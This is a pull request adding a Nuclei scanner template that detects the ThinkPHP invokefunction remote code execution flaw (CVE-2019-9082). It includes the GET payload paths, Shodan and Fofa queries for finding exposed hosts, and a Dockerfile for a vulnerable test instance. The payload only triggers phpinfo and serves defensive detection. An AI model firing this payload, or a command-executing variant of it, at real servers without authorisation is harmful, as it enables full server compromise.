### PR TITLE
CVE-2019-9082 - ThinkPHP - Command Injection

### DIFF
--- a/http/cves/2019/CVE-2019-9082.yaml
+++ b/http/cves/2019/CVE-2019-9082.yaml
@@ -1,0 +1,50 @@
+id: CVE-2019-9082
+
+info:
+  name: ThinkPHP - Remote Code Execution
+  author: elskow
+  severity: critical
+  description: |
+    ThinkPHP before 3.2.4 allows remote command execution via crafted use of the
+    invokefunction method to call system functions through URL parameters.
+  impact: |
+    Attackers can execute arbitrary system commands without authentication, leading to full server compromise.
+  remediation: |
+    Upgrade ThinkPHP to version 3.2.4 or later.
+  reference:
+    - https://github.com/xiayulei/open_source_bms/issues/33
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-9082
+    - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-9082
+    cwe-id: CWE-94
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: thinkphp
+    product: thinkphp
+    shodan-query: cpe:"cpe:2.3:a:thinkphp:thinkphp"
+    fofa-query: app="ThinkPHP"
+  tags: cve,cve2019,thinkphp,rce,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1"
+      - "{{BaseURL}}/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2019-9082 - ThinkPHP Remote Code Execution
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2019-9082
  - https://github.com/xiayulei/open_source_bms/issues/33
  - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

ThinkPHP versions before 3.2.4 are vulnerable to remote command execution through the invokefunction method. The template checks both /index.php?s= and /?s= paths since ThinkPHP can be deployed either way. Detection is based on triggering phpinfo() output rather than actual command execution to keep it safe.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

Tested locally using a dockerized ThinkPHP 5.0.20 instance.

```Dockerfile
FROM php:7.4-apache

RUN docker-php-ext-install pdo pdo_mysql

RUN a2enmod rewrite

WORKDIR /var/www/html
RUN apt-get update && apt-get install -y unzip wget git && \
    wget https://github.com/top-think/think/archive/refs/tags/v5.0.20.zip -O thinkphp.zip && \
    unzip thinkphp.zip && \
    mv think-5.0.20/* . && \
    rm -rf think-5.0.20 thinkphp.zip && \
    wget https://getcomposer.org/installer -O composer-setup.php && \
    php composer-setup.php --install-dir=/usr/local/bin --filename=composer && \
    composer config --global audit.block-insecure false && \
    composer config --global allow-plugins.topthink/think-installer true && \
    composer require topthink/framework:5.0.20 --update-no-dev && \
    chown -R www-data:www-data /var/www/html && \
    chmod -R 755 /var/www/html

# Set Apache document root to public folder
ENV APACHE_DOCUMENT_ROOT /var/www/html/public
RUN sed -i 's|/var/www/html|${APACHE_DOCUMENT_ROOT}|g' /etc/apache2/sites-available/000-default.conf && \
    sed -i 's/AllowOverride None/AllowOverride All/g' /etc/apache2/apache2.conf

EXPOSE 80
```

https://github.com/user-attachments/assets/c7c2fedd-5a13-4d54-833d-9608effaeba1


Shodan query: `cpe:"cpe:2.3:a:thinkphp:thinkphp"`
Fofa query: `app="ThinkPHP"`


### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)


/claim https://github.com/projectdiscovery/nuclei-templates/issues/14501